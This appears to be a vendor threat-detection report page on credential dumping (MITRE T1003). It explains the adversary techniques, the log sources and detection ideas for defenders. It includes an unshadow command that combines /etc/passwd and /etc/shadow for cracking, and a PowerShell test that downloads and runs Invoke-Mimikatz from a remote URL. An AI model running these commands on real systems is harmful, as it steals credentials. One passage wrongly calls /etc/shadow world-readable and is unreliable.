Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
 

T1003

OS Credential Dumping

Adversaries employ OS Credential Dumping to acquire account credentials that they can subsequently leverage for lateral movement and unauthorized access to restricted information.

Pairs with this song

#7

overall Rank

2.7%

Customers affected

331

Threats detected
 

Analysis Icon

Analysis

Why do adversaries dump credentials?

Rooted in the common need for adversaries to infiltrate user accounts and other resources within target organizations, the OS Credential Dumping technique encompasses various methods employed by adversaries and professional penetration testers to acquire valid usernames and passwords. While there are alternative methods of access that do not necessitate legitimate user credentials—such as vulnerability exploitation—possessing a functional username and password remains one of the most effective and reliable tools for discreetly gaining access to a system of interest.

Beyond the immediate objectives of dumping credentials for sale or utilizing them for initial access, the acquired credentials play a pivotal role in the post-exploit phase. Credential dumping serves as a crucial enabler for initial access, lateral movement, and privilege escalation within a targeted environment. The prevalence of this technique is primarily driven by the inherent necessity for adversaries to acquire credentials, which, in turn, facilitates access to systems, minimizes detectability, and opens avenues for creating additional accounts. Once an adversary has secured initial access to an environment, there is often a need for some level of privileged access to achieve further objectives in a campaign. These credentials may manifest in the form of hashed values or clear-text passwords. This not only streamlines the process but also enhances the likelihood of successfully navigating and exploiting the targeted system.

How do adversaries dump credentials?

Note: OS Credential Dumping makes the top 10 this year as a parent technique due in large part to custom detection analytics that don’t cleanly align with any of its more narrowly scoped sub-techniques. We will discuss the adversary behaviors those analytics detect, but we will also touch on oft-abused sub-techniques as well.

Many effective credential theft tools (e.g., L0phtCrack and gsecdump) are available to adversaries who seek to dump credentials. Mimikatz, which ranked third among detected threats in 2023, is a major contributor to the prominence of credential dumping among threat detections in the environments we monitor, and you can read an in-depth analysis of it in the Threats section of this report.

Some OS Credential Dumping sub-techniques we commonly observe and detect are:

T1003.008: /etc/passwd and /etc/shadow: Adversaries dumping the contents of /etc/passwd and /etc/shadow to enable offline password cracking

In today’s Linux operating systems, you’ll typically find user account information, including password hashes, stored in a tandem of /etc/passwd and /etc/shadow files. Notably, the /etc/shadow file, where the actual password hashes reside, is set to be readable exclusively by the root user by default.

A Linux utility called unshadow offers a way to streamline the process for password cracking. It merges information from /etc/passwd and /etc/shadow into a format tailor-made for password-cracking tools like John the Ripper. Here’s a quick command example to illustrate how it works:

# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

This command efficiently combines the pertinent data into a file named crack.password.db in the /tmp directory, setting the stage for potential password cracking endeavors.

 

T1003.001: LSASS Memory: PowerShell and other processes (e.g., Windows Task Manager and Sysinternals ProcDump) accessing and dumping memory from the Local Security Authority Subsystem Service (lsass.exe)

Once a user logs in, the system initiates the creation of credential materials, neatly storing them in the memory of the LSASS process. These credentials, accessible to an admin-level user or SYSTEM, are used for lateral movement.

Note: LSASS Memory didn’t quite make the top 10 this year, but our analysis from last year’s Threat Detection Report remains as relevant as ever.

 

T1003.003: NTDS: NTDSUtil dumping ntds.dit (Active Directory)

When adversaries engage in malicious activities, they strategically target the Active Directory domain database to compromise sensitive information, including credentials, and to extract comprehensive details regarding domain entities such as devices, users, and access privileges.

Notably, the NTDS file (NTDS.dit) assumes a central role in this context. It is typically located within %SystemRoot%\NTDS\Ntds.dit on the designated domain controller.

In the realm of tools and techniques employed for extracting information from the NTDS file and comprehensively assessing the Active Directory hash repository, the following are noteworthy:

 

T1003.007: Proc Filesystem: Gathering credentials from the proc filesystem or /proc

The proc filesystem acts as a sort of virtual window into the inner workings of the Linux kernel, especially when it comes to managing virtual memory. If an adversary has root privileges, they can delve into these memory locations to scour all processes on a system for patterns that might hint at credentials. This could involve searching for specific strings in memory structures or hunting for cached hashes. Even if the adversary doesn’t have elevated access, processes can reveal their own virtual memory locations.

 

T10003.006: DCSync:  Gathering password data from Active Directory

This sub-technique comprises abuse of the Windows Domain Controller’s API to simulate the replication process from a remote domain controller using DCSync. Members of the administrators, domain admins, and enterprise admin groups or computer accounts on the domain controller can run DCSync to pull password data from Active Directory. These may include current and historical hashes of potentially useful accounts. DCSync functionality has been included in the lsadump module within Mimikatz.

 

T1003.005: Cached domain credentials: Accessing cached credentials

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.

 

Other notable techniques we’ve seen

  • Active Directory Explorer (AD Explorer) taking snapshots of Active Directory
  • Windows Registry Console Tool (reg.exe) exporting Windows Registry hives containing credentials
  •  Windows Credential Editor dumping NT Lan Manager (NTLM) hashes

Visibility icon

Visibility

Note: The visibility sections in this report are mapped to MITRE ATT&CK data sources and components.

Process monitoring

Process monitoring is a data source that security teams should collect from if they want to observe OS Credential Dumping involving tools such as Mimikatz, Empire, L0phtCrack, and gsecdump. One quick and reliable way to observe and potentially detect credential harvesting is to monitor processes for known malicious binaries in combination with LSASS injection. Understanding the processes or programs in an environment that require access to LSASS will make this approach more effective.

Command monitoring

Monitoring process command-line parameters for known malicious CLI syntaxes may take some research and testing, but it’s also a reliable way to observe and/or detect credential harvesting activity emanating from tools such as Mimikatz and Empire. In order for this data source to be used effectively, command lines must be specific and not overly generalized (i.e., using only one command option filter).

File monitoring

Files are another potentially rich source of telemetry for credential dumping activity, particularly on Linux systems, like the /etc/passwd, /etc/shadow, and proc filesystem tradecraft described earlier, or for any Windows techniques that generate file dumps (e.g., LSASS memory).

Collection Icon

Collection

Note: The collection sections of this report showcase specific log sources from Windows events, Sysmon, and elsewhere that you can use to collect relevant security information.

Endpoint detection and response (EDR) products

Most commercial EDR products provide detailed visibility into all of the data sources referenced above and offer great value to security teams seeking to detect credential dumping.

Windows Security Event Log 4688: A new process has been created

Event Log 4688 will provide visibility into process start events with command-line logging enabled, which can help defenders develop detection or optics into any OS Credential Dumping tradecraft involving processes and corresponding commands.

Sysmon Event ID 1: Process creation

Like Event log 4688, Sysmon Event ID 1: ProcessCreation will capture process starts, including command lines, and offer visibility into credential dumping that leverages processes.

Sysmon Event ID 10: ProcessAccess

Sysmon ProcessAccess events log whenever one process attempts to access another. As we’ve discussed, LSASS abuse often involves a process accessing LSASS to dump its memory contents.

Sysmon Event ID 11: FileCreate

File creation events are a useful source of telemetry if you want to keep an eye on adversaries emptying the memory space of LSASS or otherwise creating credential dump files.

Auditd

auditd can provide visibility into credential dumping on Linux systems but can be prone to generating high volumes of noise. Monitoring reads of /etc/shadow can be especially noisy, since that passwd file is intended for anyone to read. However, there’s a smaller set of processes expected to write to it (e.g., visudo), and you may want to monitor processes from certain directories attempting reads of /etc/shadow,  namely /bin/ and /sbin/ are more likely to be the ones legitimately reading the shadow file.

Note: See the LSASS Memory page from the 2023 Threat Detection Report for specific guidance on that technique.

Icon-threat detection

Detection opportunities

 

If you’re interested in generating reliable detection coverage for credential dumping activity, you’ll want to consider monitoring for the following general behaviors:

  • unknown or known malicious processes injecting into LSASS
  • network connections to domain controller from unusual IP addresses associated with non-standard or known compromised user accounts
  • reg.exe usage with command-line reg save hklm\sam
  • the binary mimikatz.exe or references to Mimikatz arguments in the CLI
  • use of ntdsutil ifm
  • Impacket being executed for credential dumping, which would include the specified Python module, target IP, and target domain/user in the command line
  • accounts accessing ShadowHashData or the plist file (shadow file)
  • Windows binaries loading the vaultcli.dll and/or the samlib.dll

 

SecretsDump file modification

Impacket’s SecretsDump utility consistently involves the Windows Service Host (svchost.exe) writing randomly named .tmp files to the System32 directory. The following pseudo-detector should offer defenders a reliable method of detecting Impacket’s SecretsDump utility:

process ==  (‘svchost.exe`)
&&
module_load == (‘regsvc.dll’)
&&
file_path == (‘windows\system32’)

Weeding out false positives

Many of the techniques and tools used for administrative purposes can also be used for malicious credential dumping activity. As such, monitoring of processes without CLI and/or context can lead to a large number of false positives, particularly with processes such as:

  • adfind.exe,
  • taskmgr.exe,
  • ntdsutil.exe
  • reg.exe
  • vssadmin.exe
  • powershell.exe
  • adexplorer.exe

Testing Icon

Testing

Start testing your defenses against OS Credential Dumping using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View atomic tests for T1003: Credential Dumping. 

In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using PowerShell:
powershell.exe “IEX (New-Object Net. WebClient).DownloadString(‘http://bit.ly/ L3g1tCrad1e’); Invoke-Mimikatz -DumpCr”
Useful telemetry will include:
VisibilityTelemetryCollection
Visibility:

Process monitoring

Telemetry:

powershell.exe

Collection:

EDR, Windows Security Events Logs, and Sysmon should record this process start.

Visibility:

Command monitoring

Telemetry:

“DownloadString”, “WebClient”, and Invoke-Mimikatz

Collection:

EDR, Windows Security Events Logs, and Sysmon should record this process start.

 

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.

 
 
Back to Top